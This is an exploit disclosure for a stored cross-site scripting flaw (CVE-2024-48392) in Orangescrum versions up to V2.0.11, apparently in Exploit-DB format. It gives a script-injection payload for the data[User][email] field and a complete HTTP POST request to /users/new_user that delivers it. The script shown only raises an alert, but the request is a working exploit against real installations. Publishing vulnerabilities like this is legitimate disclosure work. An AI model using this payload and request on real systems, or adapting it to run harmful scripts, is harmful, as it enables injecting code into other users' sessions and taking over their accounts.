# Exploit Title:  
Orangescrum Premium or Self-Hosted <= V2.0.11 'data[User][email]' Stored Cross Site Scripting (XSS)
# Date: 11-07-2024
# Exploit Author: Aziz Nefzi
# Vendor Homepage: https://www.orangescrum.com/
# GitHub Repo Link: https://github.com/Orangescrum/orangescrum
# Version: V2.0.11
# CVE: CVE-2024-48392

Parameters: data[User][email]

Payload: {{VALID EMAIL}}"></span><script>alert(document.domain)</script>

Exploit:

POST /users/new_user HTTP/2
Host: [REDACTED].orangescrum.com
Cookie: [REDACTED]

_method=POST&data%5B_Token%5D=[FILTERED]&data%5BUser%5D%5BtimezoneName%5D=&data%5BUser%5D%5Bid%5D=28&data%5BUser%5D%5Bemail%5D={{VALID EMAIL}}"></span><script>alert(document.domain)</script>
&data%5BUser%5D%5Bpid%5D=143325&data%5BUser%5D%5Brole%5D=3&data%5B_Token%5D%5Bfields%5D=&data%5B_Token%5D%5Bunlocked%5D=